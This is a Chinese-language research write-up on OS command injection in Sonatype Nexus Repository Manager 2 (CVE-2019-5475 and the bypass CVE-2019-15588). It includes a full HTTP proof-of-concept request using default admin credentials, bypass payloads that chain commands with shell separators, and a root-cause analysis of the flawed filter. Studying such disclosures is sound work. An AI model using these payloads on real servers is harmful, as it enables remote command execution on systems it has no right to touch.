Nexus 2下载:
https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip
或者到这里找一个就行:
https://help.sonatype.com/repomanager2/download/download-archives—repository-manager-oss
注意不要下载pro版(需要license)。
PoC:
PUT /nexus/service/siesta/capabilities/000013ea3743a556 HTTP/1.1
Host: HOST:PORT
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Content-Type: application/xml
Content-Length: 333
Connection: close
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ns2:capability xmlns:ns2="http://sonatype.org/xsd/nexus-capabilities-plugin/rest/1.0"><id>healthcheck</id><notes>123</notes><enabled>true</enabled><typeId>1</typeId><properties><key>createrepoPath</key><value>C:\Windows\System32\calc.exe</value></properties></ns2:capability>
调试参考:
https://blog.csdn.net/zhu19774279/article/details/8697633
修改nexus-2.14.13-01/bin/jsw/conf/wrapper.conf
文件增加调试参数
取消注释掉这部分:
修改默认端口:
vi conf/nexus.properties
# application-port=8082
可以看到nexus2有个默认的context:nexus
这个在nexus3是没有的。
另外其log文件在:sonatype-work/nexus/logs/nexus.log
中。
CVE-2019-15588
来源:https://hackerone.com/reports/688270
对之前漏洞的绕过:
/Applications/Calculator.app/Contents/MacOS/Calculator & /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator ; /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator | /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator || /createrepo
注意要用完整路径。
分析
这个绕过的关键在于File#getName并不是获取原始的payload的字符串,而是经过File封装之后的File#getName
由于File#getName
方法仅取文件名的最后部分,
Returns the name of the file or directory denoted by this abstract pathname. This is just the last name in the pathname’s name sequence.
参考:https://docs.oracle.com/javase/8/docs/api/java/io/File.html#getName–
这个方法在路径穿越中,可以过滤掉../
。参考CVE-2019-3398
.
而在这里的判断,却帮我们过滤掉了前面的payload,躲过了这次的if判断!
然后,进入最后一个else,File#getAbsolutePath
将我们的payload原封不动地返回了。
最终执行我们的payload:
总结
最开始什么过滤都没有-> CVE-2019-5475
然后加了一个getCleanCommand做了过滤,但是过滤不严-> CVE-2019-15588
参考:
https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84
附一个github在线compare的方式:
https://github.com/sonatype/nexus-public/compare/release-2.14.14-01…release-2.14.15-01
Ref:
https://hackerone.com/reports/654888
https://issues.sonatype.org/browse/NEXUS-20626
https://support.sonatype.com/hc/en-us/articles/360033490774-CVE-2019-5475-Nexus-Repository-Manager-2-OS-Command-Injection-2019-08-09
https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63